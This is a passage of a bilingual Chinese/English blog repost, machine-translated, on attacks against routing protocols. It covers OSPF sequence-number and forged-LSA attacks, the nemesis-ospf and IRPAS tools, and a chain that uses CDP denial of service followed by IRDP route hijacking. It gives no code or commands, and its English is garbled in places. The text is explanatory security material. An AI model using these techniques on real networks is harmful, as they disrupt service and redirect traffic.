--Sequence++ 攻击即攻击者持续插入比较大的LSA sequence(序列)号信息包,根据OSPF的RFC介绍因为LS sequence number(序列号)栏是被用来判断旧的或者是否同样的LSA,比较大的序列号表示这个LSA越是新近的。 - Sequence + + Attack the attacker continued to insert relatively large LSA sequence (sequence) number of packets, according to the OSPF RFC describes as LS sequence number (serial number) field is used to determine whether the old or the same LSA, relatively large The serial number indicates that the more recent LSA. 所以到攻击者持续插入比较大的LSA sequence(序列)号信息包时候,最开始的路由器就会产生发送自己更新的LSA序列号来超过攻击者序列号的竞争,这样就导致了网络不稳定并导致拒绝服务攻击。 Therefore, the attacker continued to insert relatively large LSA sequence (sequence) number of information packets, when the beginning of the routers will have to send their updates to the LSA sequence number sequence number than the attacker's competition, thus leading to network instability and denial of service attacks.
--最大序列号攻击 - The largest sequence number attack
就是攻击者把最大的序列号0x7FFFFFFF插入。 The attacker to insert the largest sequence number 0x7FFFFFFF. 根据OSPF的RFC介绍,当想超过最大序列号的时候,LSA就必须从路由domain(域)中刷新,有InitialSequenceNumber初始化序列号。 According to OSPF, RFC, When the serial number to exceed the maximum time, LSA must be from the routing domain (domain) in the refresh, there InitialSequenceNumber initial sequence number. 这样如果攻击者的路由器序列号被插入最大序列号,并即将被初始化,理论上就会马上导致最开始的路由器的竞争。 So, if the attacker is the router serial number into the largest serial number, and about to be initialized, in theory, would immediately lead to the beginning of the router competition. 但在实践中,JiNao发现在某些情况下,拥有最大MaxSeq(序列号)的LSA并没有被清除而是在连接状态数据库中保持一小时的时间。 However, in practice, JiNao found in some cases, the largest MaxSeq (serial number) of the LSA has not been cleared but remain in the link state database in one hour.
--伪造LSA攻击 - Forgery attack LSA
这个攻击主要是gated守护程序的错误引起的,需要所有gated进程停止并重新启动来清除伪造的不正确的LSA,导致拒绝服务的产生。 This attack is mainly gated daemon error caused all gated processes need to stop and restart to clear the incorrect forgery LSA, leading to a denial of service production. 这个攻击相似对硬件的路由器不影响并且对于新版本的gated也没有效果。 This attack is similar to the router does not affect the hardware for the new version of the gated and has no effect.
上面的一些信息你可以参考http://www.ietf.org/rfc/rfc2328.txt和JiNao对OSPF的漏洞分析:On the Vulnerabilities and Protection of OSPF Routing Protocol ( http://www.anr.mcnc.org/projects/JiNao/ic3n98.ps). Some of the information above, you can refer to http://www.ietf.org/rfc/rfc2328.txt and JiNao vulnerability analysis of OSPF: On the Vulnerabilities and Protection of OSPF Routing Protocol (http://www.anr.mcnc. org/projects/JiNao/ic3n98.ps).
nemesis-ospf能对OSPF协议产生上述攻击,但是,由于nemesis-ospf太多的选项和需要对OSPF有详细深刻的了解,所以一般的攻击者和管理人员难于实现这些攻击。 nemesis-ospf OSPF protocol can generate the attack, but because of nemesis-ospf too many options and the need to have more profound understanding of OSPF, it is generally difficult for the attacker and managers to achieve these attacks. 并且也听说nemesis-ospf也不是一直正常正确的工作,就更限制了这个工具的使用价值。 And also heard nemesis-ospf is not working properly has been normal, even limiting the use value of this tool.
OSPF 认证需要KEY的交换,每次路由器必须来回传递这个KEY来认证自己和尝试传递OSPF消息,路由器的HELLO信息包在默认配置下是每10秒在路由器之间传递,这样就给攻击者比较的大机会来窃听这个KEY,如果攻击者能窃听网络并获得这个KEY的话,OSPF信息包就可能被伪造,更严重的会盲目重定向这些被伪造的OSPF信息包。 OSPF authentication exchange required KEY, each router must be passed back and forth the KEY to authenticate OSPF messages themselves and try to pass the router's HELLO packets in the default configuration is every 10 seconds passed between the routers, which gives the attacker more great opportunity to eavesdrop on the KEY, if the attacker can eavesdrop on the network and get the KEY words, OSPF packets can be forged, more serious will be forged blindly redirect these OSPF packet. 当然这些攻击少之又少,不光光是其难度,重要的是因为还有其他更容易的安全漏洞可以利用,谁不先捏软柿子. Of course very few of these attacks, not only just the difficulty, it is important because there are other security vulnerabilities can be easier to use, who would not be pinching any punches either.
这里建议如果一个主机不要使用动态路由,大多数的主机使用静态路由就能很好的完成起功能。 It is recommended that if a host not to use dynamic routing, static routing most of the hosts can be very good from completion of the function. 因为使用动态路由协议很会受到攻击,例如,几年以前gated软件就被发现有一个认证的问题。 Since the use of dynamic routing protocols are subject to attack, for example, a few years ago gated software was found to have a certificate problem.
------------------------- -------------------------
关于使用IRPAS对CDP和IRDP攻击 On the use of IRPAS attack on the CDP and IRDP
IRPAS的cdp程序主要对发送CDP (Cisco router Discovery Protocol)消息给CISCO路由器并对内部网络段产生拒绝服务攻击,发送一些垃圾字符就会导致路由器重新启动或者崩溃。 IRPAS The cdp program mainly to send CDP (Cisco router Discovery Protocol) message to the CISCO router and internal network segments generated denial of service attacks, send junk characters will cause the router to restart or crash. 它也能作为欺骗来使用,为其他更危险的程序打开方便的大门,一种可能的攻击场景:如使用cdp来使路由器停止服务,然后使用irdp或者 irdresponder工具发送高优先值来通知一新的路由器,这样如果我们的目标路由器不能与被拒绝服务攻击而停止服务的通信,新的路由器的高优先值就会被采用,如果攻击者设置的这个值被成功采用的话,攻击者就能在他们的系统中轻松插入通信路径。 It can also be used as a cheat, more dangerous for the other program to open a convenient door to a possible attack scenarios: If the router uses cdp to stop the service, and then use irdp or irdresponder tool to send high-priority values to inform a new router, the router so that if our goal can not be denial of service attacks and stop the service of communication, the new router will be using the high priority value, if an attacker successfully set this value to be used, the attacker can in their easily inserted in the communication system path.
这种类型的攻击也可以应用在某些配置了使用IRDP协议的主机,如WINDOWS98默认情况下配置使用IRDP,WINNT需要手工配置支持IRDP环境,并在启动的时候广播3个ICMP Router Solicitation messages(ICMP路由请求消息)。 This type of attack can also be used in some configurations using the IRDP protocol host, such as default configuration WINDOWS98 use IRDP, WINNT need to manually configure support IRDP environment, and when you start broadcasting three ICMP Router Solicitation messages (ICMP route request message). L0pht有文章详细的描述关于WINDOWS和SUN机器上的采用IRDP而存在漏洞,你可以在下面的地址找到这篇文章: L0pht a detailed description of the article on WINDOWS and SUN machines using IRDP and flawed, you can find this article the following address:
http://www.l0pht.com/advisories/rdp.txt http://www.l0pht.com/advisories/rdp.txt
================================================================================= ================================================== ===============================
电脑网络如Internet很大程度上依靠路由协议的正确处理,国内如有些通的线路很不正常,很大程度因为是没有很好的处理路由。 Relies heavily on computer networks such as Internet routing protocols to correctly handle the domestic through the line as some very normal, largely because there is no good treatment route. 而路由协议的安全也尤为重要,虽然针对路由协议的攻击现在不是很多,我也很少看见这方面的介绍(不知道不肯知道,还是其他原因。希望这破砖能引出更多的美玉来),但随着一些工具如nemesis和irpas的出现,和一些针对底层网络的保护的研究开发如JiNao IDS,会对路由协议的攻击更加容易化和易理解化。 The routing protocol security is particularly important, although the attacks against the routing protocol is not a lot, I rarely see this presentation (do not know would not know, or for other reasons. Hope this will lead to more broken jade tiles to ), but with some tools such as the nemesis and the emergence of irpas, and some protection for the underlying network of research and development, such as JiNao IDS, the attack would be easier routing protocol oriented and easy to understand technology.
Tidak ada komentar:
Posting Komentar